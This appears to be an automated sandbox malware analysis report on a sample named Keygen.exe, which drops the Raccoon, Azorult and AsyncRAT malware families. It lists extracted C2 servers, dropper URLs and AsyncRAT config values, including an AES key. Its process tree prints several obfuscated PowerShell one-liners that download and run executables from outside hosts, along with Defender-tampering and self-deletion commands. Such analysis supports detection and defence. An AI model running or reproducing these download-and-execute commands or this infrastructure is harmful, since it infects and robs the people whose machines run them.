Analysis
-
max time kernel
85s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 16:58
General
-
Target
Keygen.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Family
raccoon
Botnet
5e4db353b88c002ba6466c06437973619aad03b3
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 8 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Async RAT payload 3 IoCs
-
ModiLoader First Stage 2 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
-
Loads dropped DLL 14 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 3 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B50D.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\igu.exe"C:\Users\Public\igu.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5024 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\532779383507207\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 50249⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\igu.exe"C:\Users\Public\igu.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\iuy.exe"C:\Users\Public\iuy.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\fot.exe"C:\Users\Public\fot.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4880 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\387048281062832\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 48809⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\fot.exe"C:\Users\Public\fot.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe"C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe"C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ErIxQphJLi.exe"C:\Users\Admin\AppData\Local\Temp\ErIxQphJLi.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe"C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe"C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\tqb2hofu.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe"C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe"C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\fot.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\r5e4qhbt.exe2⤵
-
C:\Windows\temp\r5e4qhbt.exeC:\Windows\temp\r5e4qhbt.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\freebl3.dll
-
C:\ProgramData\freebl3.dll
-
C:\ProgramData\mozglue.dll
-
C:\ProgramData\mozglue.dll
-
C:\ProgramData\msvcp140.dll
-
C:\ProgramData\msvcp140.dll
-
C:\ProgramData\nss3.dll
-
C:\ProgramData\nss3.dll
-
C:\ProgramData\sqlite3.dll
-
C:\ProgramData\sqlite3.dll
-
C:\ProgramData\vcruntime140.dll
-
C:\ProgramData\vcruntime140.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Zr1WB723b.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2n8XBQMHQS.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4pTGHGA26G.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZvENb6ggC9.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lhIx28u9ZV.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe
-
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe
-
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe
-
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe
-
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe
-
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe
-
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe
-
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe
-
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe
-
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe
-
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe
-
C:\Users\Admin\AppData\Local\Temp\6CSy5t5Akv.exe
-
C:\Users\Admin\AppData\Local\Temp\6CSy5t5Akv.exe
-
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\Keygen.exe
-
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\Keygen.exe
-
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b.hta
-
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b1.hta
-
